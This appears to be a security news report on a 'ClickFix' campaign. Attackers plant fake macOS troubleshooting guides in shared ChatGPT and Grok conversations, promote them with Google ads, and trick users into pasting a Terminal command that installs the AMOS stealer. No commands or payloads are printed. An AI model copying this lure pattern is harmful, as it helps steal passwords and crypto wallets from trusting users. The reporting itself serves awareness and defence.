Threat Actors Use ChatGPT, Grok & Google Weaponize Leverages

Cybercriminals have launched a sophisticated attack campaign. This new offensive exploits user trust in artificial intelligence (AI) platforms to distribute the Atomic macOS Stealer (AMOS). These tactics mark a dangerous evolution in social engineering.

This new threat combines legitimate AI chatbot services from ChatGPT and Grok with paid Google advertising to lure unsuspecting Mac users into executing malicious terminal commands that compromise their systems.

The campaign specifically targets individuals searching for common troubleshooting solutions, such as clearing disk space on macOS, redirecting them to seemingly authentic AI-generated instructions hosted on trusted domains.

The attack method leverages a technique known as “ClickFix,” where users are tricked into manually running shell commands that download and install malware directly onto their devices.

What makes this campaign particularly effective is its ability to bypass traditional security measures by appearing completely legitimate, as the malicious instructions are hosted on official ChatGPT and Grok websites rather than suspicious third-party domains.

Once executed, the AMOS stealer immediately begins harvesting sensitive information including browser passwords, cryptocurrency wallet seed phrases, Keychain credentials, and personal files, transmitting everything to attacker-controlled servers.

Flare analysts identified that attackers create shareable AI chat links containing step-by-step “installation guides” disguised as legitimate macOS troubleshooting instructions.

These conversations are then promoted to the top of Google search results through paid advertising campaigns, ensuring maximum visibility when users search for common technical queries.

The social engineering component proves remarkably effective because users inherently trust results appearing on reputable platforms like OpenAI and X.AI domains, combined with the additional credibility boost from appearing as sponsored Google search results.

Attack Mechanism and Infection Chain

The infection process begins when a Mac user conducts a routine Google search for troubleshooting assistance, such as “clear disk space on macOS” or similar technical queries.

Sponsored advertisements or highly-ranked organic results direct victims to shared ChatGPT or Grok conversations that appear to offer helpful system maintenance guidance.

These AI-generated conversations contain carefully crafted instructions that prompt users to open their Terminal application and paste what appears to be a harmless command.

The malicious command downloads a script from an external domain controlled by the attackers, which then repeatedly requests the user’s system password under the guise of legitimate system operations.

Once the correct credentials are provided, the script installs the AMOS infostealer along with a persistent backdoor that survives system reboots and provides long-term remote access to the compromised machine.

The malware immediately targets cryptocurrency wallets including Electrum, Exodus, Coinbase, MetaMask, and Ledger Live, extracting seed phrases and private keys that enable immediate theft of digital assets.

Additionally, AMOS harvests browser data from Chrome, Safari, and Firefox, including saved passwords, cookies, autofill information, and active login sessions.

Organizations and individual Mac users should monitor for unsigned applications requesting system passwords, unusual Terminal activity, and unexpected network connections to unfamiliar domains.

Security teams must educate users that instructions appearing on trusted AI platforms can be compromised through social engineering, and any guidance requesting Terminal command execution should be independently verified through official support channels before implementation.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.